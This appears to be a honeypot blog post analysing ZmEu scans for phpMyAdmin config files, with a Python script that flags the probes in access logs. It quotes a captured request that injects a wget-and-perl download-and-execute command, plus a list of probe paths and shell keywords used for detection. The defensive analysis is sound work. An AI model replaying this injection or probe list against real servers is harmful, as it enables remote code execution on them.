Sunday night, the weather is getting colder and the kids are asleep: a nice time to check the honeypot logs. Some days ago SANS reported a binary that was new at the time, "dd_ssh" ( http://isc.sans.edu/diary.html?storyid=9370 ), and tied the attack to a phpMyAdmin vulnerability. The honeypot is also grabbing a set of URLs that are probably related to the same attack vector: one scanner walks through every common phpMyAdmin directory name looking for config/config.inc.php and passes p=phpinfo(); to it, apparently testing whether the file will execute the parameter.
GET //phpMyAdmin2/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //phpMyAdmin-2.5.1/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //phpMyAdmin-2.5.6/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //phpmyadmin/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //sqlweb/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //webdb/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //phpMyAdmin-2/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //php-myadmin/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //pMA/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //bbs/data/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //phpmy-admin/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //mysqlmanager/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //webadmin/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //phpMyAdmin/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //pma/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //dbadmin/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //phpMyAdmin-2.2.6/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //phpMyAdmin-2.5.5-rc1config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //phpMyAdmin-2.5.6-rc1/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //phpMyAdmin-2.5.5-pl1/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //PHPMYADMIN/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //phpMyAdmin-2.5.4/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //phpMyAdmin-2.2.3/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //phpMyAdmin-2.5.6-rc2/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //PMA/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //admin/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //myadmin/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //mysql-admin/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //phpmanager/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //phpmyadmin2/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //websql/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //mysql/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //PMA2005/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //php-my-admin/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //sqlmanager/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //pma2005/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //roundcube/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //mysqladminconfig/config.inc.php?p=phpinfo(); HTTP/1.1
GET //sl2/data/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //phpMyAdmin-2.5.5/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //phpMyAdmin-2.5.5-rc2/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //p/m/a/config/config.inc.php?p=phpinfo(); HTTP/1.1
One user agent also keeps showing up in the logs: " User-Agent: Made by ZmEu @ WhiteHat Team - www.whitehat.ro ". The WOT scorecard for whitehat.ro ( http://www.mywot.com/en/scorecard/whitehat.ro ), though, shows nothing resembling a white hat...
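To pick these scans out of a real access log rather than eyeballing them, here is an added example (my own script, not part of the original post or of any honeypot software) that parses Apache combined-format lines and tags requests for the config/config.inc.php probe, the phpinfo(); eval test, shell-command injection in a parameter, and the ZmEu user agent. The sample log lines are constructed for the example in the same shape as the requests above; IP addresses and timestamps are made up, and the tag names are my own.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample in Apache "combined" format, modelled on the honeypot
# requests above. Addresses and timestamps are invented for the example.
SAMPLE_LOG = """\
10.0.0.5 - - [07/Nov/2010:21:03:11 +0100] "GET //phpMyAdmin-2.5.6/config/config.inc.php?p=phpinfo(); HTTP/1.1" 404 210 "-" "Made by ZmEu @ WhiteHat Team - www.whitehat.ro"
10.0.0.5 - - [07/Nov/2010:21:03:12 +0100] "GET //pma/config/config.inc.php?p=phpinfo(); HTTP/1.1" 404 210 "-" "ZmEu"
10.0.0.9 - - [07/Nov/2010:21:05:40 +0100] "GET //phpmyadmin//config.inc.php?c=cd%20/tmp;wget%20idol.altervista.org/whitehat;perl%20whitehat;rm%20-rf%20whitehat HTTP/1.1" 200 - "-" "ZmEu"
10.0.0.22 - - [07/Nov/2010:21:06:01 +0100] "GET /index.php HTTP/1.1" 200 1523 "-" "Mozilla/5.0"
"""

# Apache combined log format: ip ident user [time] "request" status size "referer" "ua"
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)

# Words that betray a download-and-execute payload inside a query parameter.
SHELL_WORDS = ("wget", "curl", "perl", "/tmp")


def parse_line(line):
    """Return the log fields as a dict, or None if the line is not combined format."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def split_target(target):
    """Split a request target into a slash-collapsed path and decoded parameters.

    Done by hand rather than with urlsplit(): the scanner sends targets starting
    with '//', which urlsplit() would misread as a host name.
    """
    path, _, query = target.partition("?")
    path = re.sub(r"/+", "/", path)
    params = {}
    for kv in query.split("&"):          # parse_qs() may split on ';' on older Pythons
        if kv:
            k, _, v = kv.partition("=")
            params.setdefault(unquote_plus(k), []).append(unquote_plus(v))
    return path, params


def classify(entry):
    """Return the list of tags that make this request suspicious (empty if clean)."""
    tags = []
    path, params = split_target(entry["target"])
    values = " ".join(v for vals in params.values() for v in vals)

    if path.endswith("/config.inc.php"):
        tags.append("pma-config-probe")           # hunting for the phpMyAdmin config file
    if "phpinfo(" in values:
        tags.append("php-eval-test")              # checks whether the parameter gets executed
    if ";" in values and any(w in values for w in SHELL_WORDS):
        tags.append("shell-cmd-injection")        # cd /tmp;wget ...;perl ... style payload
    if "zmeu" in entry["ua"].lower():
        tags.append("ua-zmeu")
    # A 200 on a probe means the path exists (or, on a honeypot, was answered):
    # that is the line to follow up on, not the 404s.
    if tags and entry["status"] == "200":
        tags.append("answered-200")
    return tags


def analyze(log_text):
    """Map source IP -> [(target, tags), ...] for suspicious requests only."""
    hits = {}
    for line in log_text.splitlines():
        entry = parse_line(line)
        if entry is None:
            continue
        tags = classify(entry)
        if tags:
            hits.setdefault(entry["ip"], []).append((entry["target"], tags))
    return hits


def probed_dirs(log_text):
    """Directory names tried in front of config.inc.php: the scanner's own wordlist."""
    names = set()
    for line in log_text.splitlines():
        entry = parse_line(line)
        if entry is None:
            continue
        path, _ = split_target(entry["target"])
        if path.endswith("/config.inc.php"):
            names.add(path.strip("/").split("/")[0])
    return sorted(names)


if __name__ == "__main__":
    for ip, reqs in analyze(SAMPLE_LOG).items():
        for target, tags in reqs:
            print(ip, ",".join(tags), target)
    print("probed directories:", probed_dirs(SAMPLE_LOG))
```

Feed it a real access log (`analyze(open("access.log").read())`) and sort by the "answered-200" and "shell-cmd-injection" tags first; the 404s are just the scanner's wordlist, which `probed_dirs()` hands you directly so you can check that none of those names exist on your own servers.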
"GET //phpmyadmin//config.inc.php?c=cd%20/tmp;wget%20idol.altervista.org/whitehat;perl%20whitehat;rm%20-rf%20whitehat HTTP/1.1" 200 - "-" "ZmEu"
This is a log from the same attack.